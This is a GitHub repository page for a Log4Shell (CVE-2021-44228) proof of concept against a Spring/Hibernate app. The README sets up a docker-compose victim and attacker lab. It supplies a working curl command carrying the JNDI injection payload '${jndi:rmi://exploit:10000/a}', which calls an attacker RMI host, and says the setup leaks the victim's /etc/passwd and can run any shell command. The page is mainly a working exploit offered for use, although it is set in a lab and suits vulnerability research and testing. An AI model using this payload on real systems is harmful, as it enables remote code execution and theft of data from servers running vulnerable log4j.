Skip to content

uint0/cve-2021-44228--spring-hibernate

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
exploit
exploit
 
 
victim
victim
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
docker-compose.yml
docker-compose.yml
 
 

Repository files navigation

CVE-2021-44228 POC - Spring / Hibernate

This POC uses Spring / Hibernate, however a similar approach of rmi -> deserialization could be used to trigger any deserialization vulnerability

TL;DR

$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'

You should see the contents of the victim's /etc/passwd appear in the logs of the attacker container. You can replace the command in the exploit service to run any shell command on the victim.

Victim

The victim is running a standard starter spring app with the "Spring Data JPA" (for Hibernate), "Spring Web", and "H2" (as a data store) dependencies. Only 2 modifications have been made on top of this

  1. Removed tests
  2. Replaced the slf4j logger with the vulnerable log4j

All dependencies are up to date. There are no magic flags enabled.

The victim exposes a POST-able endpoint on / which will log the request.

Exploit

The exploit relies on a fork of ysoserial using the Hibernate exploit generator. In order to have the exploit to work with the latest version of hibernate we will need to recompile ysoserial.

About

CVE-2021-44228 POC - Spring / Hibernate

Resources

Readme
Activity

Stars

1 star

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages